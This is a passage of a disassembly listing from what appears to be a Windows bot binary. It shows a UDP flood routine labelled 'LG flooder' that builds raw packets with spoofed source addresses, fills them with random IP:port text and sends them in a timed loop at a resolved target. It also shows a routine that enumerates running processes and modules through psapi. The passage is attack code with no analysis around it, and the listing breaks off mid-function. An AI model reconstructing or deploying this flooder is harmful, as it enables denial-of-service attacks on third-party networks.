lea eax, [ebp+var_108D]
push eax
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_118D]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405710
lea eax, [ebp+var_118D]
push eax
call ds:dword_41723C ; gethostbyname
mov [ebp+var_1344], eax
cmp [ebp+var_1344], 0
jnz short loc_405700
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405700: ; CODE XREF: sub_4055E5+106�j
mov eax, [ebp+var_1344]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
loc_405710: ; CODE XREF: sub_4055E5+EA�j
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405729
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405729: ; CODE XREF: sub_4055E5+12F�j
push 1060h
push 0
lea eax, [ebp+var_1074]
push eax
call sub_416B6A ; memset
add esp, 0Ch
lea eax, [ebp+var_1074]
mov [ebp+var_133C], eax
lea eax, [ebp+var_1058]
mov [ebp+var_14], eax
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0F0h
or al, 5
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0Fh
or al, 40h
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov byte ptr [eax+9], 11h
mov eax, [ebp+var_133C]
mov ecx, [ebp+var_C]
mov [eax+10h], ecx
mov eax, [ebp+var_133C]
mov cx, [ebp+var_E]
mov [eax+16h], cx
and [ebp+var_1338], 0
jmp short loc_4057B6
; ---------------------------------------------------------------------------
loc_4057A9: ; CODE XREF: sub_4055E5:loc_405E22�j
mov eax, [ebp+var_1338]
inc eax
mov [ebp+var_1338], eax
loc_4057B6: ; CODE XREF: sub_4055E5+1C2�j
mov eax, [ebp+var_1338]
cmp eax, [ebp+var_1087]
jge loc_405E27
mov eax, [ebp+var_107F]
mov [ebp+var_1358], eax
cmp [ebp+var_1358], 1
jz short loc_4057FC
cmp [ebp+var_1358], 2
jz loc_405924
cmp [ebp+var_1358], 3
jz loc_405A11
jmp loc_405C71
; ---------------------------------------------------------------------------
loc_4057FC: ; CODE XREF: sub_4055E5+1F6�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_40581E: ; CODE XREF: sub_4055E5+2BF�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4058A9
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_40581E
; ---------------------------------------------------------------------------
loc_4058A9: ; CODE XREF: sub_4055E5+247�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405924: ; CODE XREF: sub_4055E5+1FF�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405946: ; CODE XREF: sub_4055E5+3CB�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4059B2
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405946
; ---------------------------------------------------------------------------
loc_4059B2: ; CODE XREF: sub_4055E5+36F�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405A11: ; CODE XREF: sub_4055E5+20C�j
push 2
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_134C], eax
cmp [ebp+var_134C], 0
jnz short loc_405A52
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405A52: ; CODE XREF: sub_4055E5+444�j
cmp [ebp+var_134C], 1
jnz loc_405B87
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405A81: ; CODE XREF: sub_4055E5+522�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405B0C
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405A81
; ---------------------------------------------------------------------------
loc_405B0C: ; CODE XREF: sub_4055E5+4AA�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405B87: ; CODE XREF: sub_4055E5+474�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405BA9: ; CODE XREF: sub_4055E5+62E�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405C15
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405BA9
; ---------------------------------------------------------------------------
loc_405C15: ; CODE XREF: sub_4055E5+5D2�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
loc_405C6F: ; CODE XREF: sub_4055E5+468�j
; sub_4055E5+59D�j
jmp short loc_405C93
; ---------------------------------------------------------------------------
loc_405C71: ; CODE XREF: sub_4055E5+212�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405C93: ; CODE XREF: sub_4055E5+33A�j
; sub_4055E5+427�j ...
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_1354], eax
and [ebp+var_1350], 0
jmp short loc_405CB8
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: sub_4055E5+6F9�j
mov eax, [ebp+var_1350]
inc eax
mov [ebp+var_1350], eax
loc_405CB8: ; CODE XREF: sub_4055E5+6C4�j
mov eax, [ebp+var_1350]
cmp eax, [ebp+var_1354]
jnb short loc_405CE0
mov eax, [ebp+var_14]
add eax, [ebp+var_1350]
mov al, [eax]
shl al, 1
mov ecx, [ebp+var_14]
add ecx, [ebp+var_1350]
mov [ecx], al
jmp short loc_405CAB
; ---------------------------------------------------------------------------
loc_405CE0: ; CODE XREF: sub_4055E5+6DF�j
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+2], ax
call sub_41043F
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+4], ax
call sub_410483
neg eax
sbb eax, eax
and al, 0C0h
add eax, 80h
mov ecx, [ebp+var_133C]
mov [ecx+8], al
push 2
push offset dword_41F018
call ds:dword_417244 ; inet_addr
push eax
call sub_4040E8
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ch], eax
mov eax, [ebp+var_1354]
add eax, 14h
push eax
push [ebp+var_133C]
call sub_40407D
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ah], ax
movzx eax, [ebp+var_E]
test eax, eax
jnz short loc_405D7F
call sub_41043F
mov ecx, [ebp+var_133C]
mov [ecx+16h], ax
loc_405D7F: ; CODE XREF: sub_4055E5+789�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+14h], ax
mov eax, [ebp+var_1354]
add eax, 8
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+18h], ax
push 10h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
lea eax, [ebp+var_1074]
push eax
push [ebp+var_1078]
call ds:dword_417250 ; sendto
mov [ebp+var_1348], eax
cmp [ebp+var_1348], 0FFFFFFFFh
jnz short loc_405E08
push [ebp+var_1334]
call sub_409763
pop ecx
push [ebp+var_1078]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_405E41
; ---------------------------------------------------------------------------
loc_405E08: ; CODE XREF: sub_4055E5+805�j
push [ebp+var_1083]
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1334]
cmp dword ptr [eax+4], 0
jz short loc_405E22
jmp short loc_405E27
; ---------------------------------------------------------------------------
loc_405E22: ; CODE XREF: sub_4055E5+839�j
jmp loc_4057A9
; ---------------------------------------------------------------------------
loc_405E27: ; CODE XREF: sub_4055E5+1DD�j
; sub_4055E5+83B�j
push [ebp+var_1078]
call sub_4053B1
pop ecx
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
locret_405E41: ; CODE XREF: sub_4055E5+59�j
; sub_4055E5+94�j ...
leave
retn 4
sub_4055E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E45 proc near ; CODE XREF: sub_40A9CF+8B2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_405E5D
cmp [ebp+arg_8], 0
jz short loc_405E5D
cmp [ebp+arg_14], 0
jnz short loc_405E62
loc_405E5D: ; CODE XREF: sub_405E45+A�j
; sub_405E45+10�j
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E62: ; CODE XREF: sub_405E45+16�j
push 2B9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405E7B
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E7B: ; CODE XREF: sub_405E45+2F�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A7h
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 2A7h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2ADh], eax
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B1h], eax
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B5h], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 0EA60h
jge short loc_405F0E
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_8], eax
jmp short loc_405F15
; ---------------------------------------------------------------------------
loc_405F0E: ; CODE XREF: sub_405E45+B9�j
mov [ebp+var_8], 0EA60h
loc_405F15: ; CODE XREF: sub_405E45+C7�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+2B1h], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 64h
jle short loc_405F3B
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_C], eax
jmp short loc_405F42
; ---------------------------------------------------------------------------
loc_405F3B: ; CODE XREF: sub_405E45+E6�j
mov [ebp+var_C], 64h
loc_405F42: ; CODE XREF: sub_405E45+F4�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+2B1h], ecx
push offset aLgFlooder ; "LG flooder"
push 0
push [ebp+var_4]
push offset sub_4055E5
call sub_4095A4
add esp, 10h
locret_405F65: ; CODE XREF: sub_405E45:loc_405E5D�j
; sub_405E45+31�j
leave
retn
sub_405E45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F67 proc near ; CODE XREF: sub_4017AA+6E�p
; sub_401D6E+77�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jnz short loc_405F8E
push 1A3h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_0]
mov byte ptr [eax+198h], 1
jmp short loc_405FA1
; ---------------------------------------------------------------------------
loc_405F8E: ; CODE XREF: sub_405F67+7�j
push 1A3h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
loc_405FA1: ; CODE XREF: sub_405F67+25�j
pop ebp
retn
sub_405F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FA3 proc near ; CODE XREF: UPX0:004168C1�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push offset dword_41E380
call sub_409C36
pop ecx
push offset aPsapi_dll ; "psapi.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405FC8
jmp short locret_40603F
; ---------------------------------------------------------------------------
loc_405FC8: ; CODE XREF: sub_405FA3+21�j
push offset aEnumprocesses ; "EnumProcesses"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E37C, eax
push offset aEnumprocessmod ; "EnumProcessModules"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E370, eax
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E374, eax
push offset aGetmoduleinfor ; "GetModuleInformation"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E378, eax
cmp ds:dword_41E37C, 0
jz short locret_40603F
cmp ds:dword_41E370, 0
jz short locret_40603F
cmp ds:dword_41E374, 0
jz short locret_40603F
cmp ds:dword_41E378, 0
jz short locret_40603F
mov ds:byte_41E39C, 1
locret_40603F: ; CODE XREF: sub_405FA3+23�j
; sub_405FA3+78�j ...
leave
retn
sub_405FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406041 proc near ; CODE XREF: sub_401244:loc_40129D�p
; sub_40637C+29�p
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_12B = byte ptr -12Bh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
push edi
push offset dword_41E380
call sub_409C6C
pop ecx
movzx eax, ds:byte_41E39C
test eax, eax
jnz short loc_406074
push offset dword_41E380
call sub_409C7A
pop ecx
xor eax, eax
jmp loc_40636A
; ---------------------------------------------------------------------------
loc_406074: ; CODE XREF: sub_406041+1F�j
and [ebp+var_C], 0
and [ebp+var_4], 0
and [ebp+var_1C], 0
push [ebp+var_1C]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_406097
jmp loc_406368
; ---------------------------------------------------------------------------
loc_406097: ; CODE XREF: sub_406041+4F�j
; sub_406041:loc_4060E9�j
mov eax, [ebp+var_1C]
add eax, 80h
mov [ebp+var_1C], eax
push [ebp+var_1C]
push [ebp+var_14]
call sub_416BF6 ; realloc
pop ecx
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4060BD
jmp loc_406366
; ---------------------------------------------------------------------------
loc_4060BD: ; CODE XREF: sub_406041+75�j
lea eax, [ebp+var_4]
push eax
push [ebp+var_1C]
push [ebp+var_14]
call ds:dword_41E37C
test eax, eax
jnz short loc_4060DF
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406364
; ---------------------------------------------------------------------------
loc_4060DF: ; CODE XREF: sub_406041+8E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_1C]
jnb short loc_4060E9
jmp short loc_4060EB
; ---------------------------------------------------------------------------
loc_4060E9: ; CODE XREF: sub_406041+A4�j
jmp short loc_406097
; ---------------------------------------------------------------------------
loc_4060EB: ; CODE XREF: sub_406041+A6�j
mov eax, [ebp+var_4]
shr eax, 2
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
imul eax, 114h
add eax, 8
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40611E
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406362
; ---------------------------------------------------------------------------
loc_40611E: ; CODE XREF: sub_406041+CD�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov eax, [ebp+var_C]
add eax, 8
mov ecx, [ebp+var_C]
mov [ecx+4], eax
and [ebp+var_10], 0
jmp short loc_40613F
; ---------------------------------------------------------------------------
loc_406138: ; CODE XREF: sub_406041+156�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_40613F: ; CODE XREF: sub_406041+F5�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb short loc_406199
push 114h
push 0
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_10]
mov esi, [ebp+var_14]
mov edx, [esi+edx*4]
mov [ecx+eax], edx
push offset aSystem ; "system"
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_406138
; ---------------------------------------------------------------------------
loc_406199: ; CODE XREF: sub_406041+104�j
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
and [ebp+var_10], 0
jmp short loc_4061AF
; ---------------------------------------------------------------------------
loc_4061A8: ; CODE XREF: sub_406041+1A8�j
; sub_406041+1D8�j ...
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4061AF: ; CODE XREF: sub_406041+165�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb loc_406343
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
push 410h
call ds:dword_417094 ; OpenProcess
mov [ebp+var_130], eax
cmp [ebp+var_130], 0
jnz short loc_4061EB
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_4061EB: ; CODE XREF: sub_406041+1A6�j
and [ebp+var_20], 0
and [ebp+var_28], 0
lea eax, [ebp+var_20]
push eax
push 4
lea eax, [ebp+var_28]
push eax
push [ebp+var_130]
call ds:dword_41E370
test eax, eax
jnz short loc_40621B
push [ebp+var_130]
call ds:dword_4170A4 ; CloseHandle
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_40621B: ; CODE XREF: sub_406041+1CA�j
push 0Ch
lea eax, [ebp+var_13C]
push eax
push [ebp+var_28]
push [ebp+var_130]
call ds:dword_41E378
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_13C]
mov [ecx+eax+4], edx
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_138]
mov [ecx+eax+8], edx
mov al, ds:byte_41DF00
mov [ebp+var_12C], al
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_12B]
rep stosd
stosw
stosb
push 104h
lea eax, [ebp+var_12C]
push eax
push [ebp+var_13C]
push [ebp+var_130]
call ds:dword_41E374
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_406332
movsx eax, [ebp+var_12C]
test eax, eax
jz short loc_406332
push 104h
lea eax, [ebp+var_12C]
push eax
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_12C]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_18], eax
jmp short loc_4062F7
; ---------------------------------------------------------------------------
loc_4062F0: ; CODE XREF: sub_406041:loc_406330�j
mov eax, [ebp+var_18]
dec eax
mov [ebp+var_18], eax
loc_4062F7: ; CODE XREF: sub_406041+2AD�j
cmp [ebp+var_18], 0
jz short loc_406332
cmp [ebp+var_18], 1
ja short loc_406305
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406305: ; CODE XREF: sub_406041+2C0�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [ebp+eax+var_130+3]
cmp eax, 5Ch
jnz short loc_406330
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_18]
mov [ecx+eax+110h], edx
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_406041+2D2�j
jmp short loc_4062F0
; ---------------------------------------------------------------------------
loc_406332: ; CODE XREF: sub_406041+264�j
; sub_406041+273�j ...
push [ebp+var_130]
call ds:dword_4170A4 ; CloseHandle
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_406343: ; CODE XREF: sub_406041+174�j
push offset dword_41E380
call sub_409C7A
pop ecx
mov eax, [ebp+var_C]
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406353: ; CODE XREF: sub_406041:loc_406362�j
; sub_406041:loc_406364�j ...
push offset dword_41E380
call sub_409C7A
pop ecx
xor eax, eax
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406362: ; CODE XREF: sub_406041+D8�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406364: ; CODE XREF: sub_406041+99�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406366: ; CODE XREF: sub_406041+77�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406368: ; CODE XREF: sub_406041+51�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_40636A: ; CODE XREF: sub_406041+2E�j
; sub_406041+310�j ...
pop edi
pop esi
leave
retn
sub_406041 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40636E proc near ; CODE XREF: sub_401244+4D2�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_40636E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40637C proc near ; DATA XREF: sub_4064BF+3B�o
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_406041
mov [ebp+var_1AC], eax
cmp [ebp+var_1AC], 0
jz loc_4064AD
mov eax, [ebp+var_1AC]
push dword ptr [eax]
mov eax, [ebp+var_1A8]
push dword ptr [eax]
push offset dword_418B1C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1B0], 0
jmp short loc_4063F7
; ---------------------------------------------------------------------------
loc_4063EA: ; CODE XREF: sub_40637C:loc_40649C�j
mov eax, [ebp+var_1B0]
inc eax
mov [ebp+var_1B0], eax
loc_4063F7: ; CODE XREF: sub_40637C+6C�j
mov eax, [ebp+var_1AC]
mov ecx, [ebp+var_1B0]
cmp ecx, [eax]
jge loc_4064A1
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+8]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+4]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push offset dword_418B04
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
mov eax, [ebp+var_1A8]
cmp dword ptr [eax+4], 0
jz short loc_40649C
jmp short loc_4064A1
; ---------------------------------------------------------------------------
loc_40649C: ; CODE XREF: sub_40637C+11C�j
jmp loc_4063EA
; ---------------------------------------------------------------------------
loc_4064A1: ; CODE XREF: sub_40637C+89�j
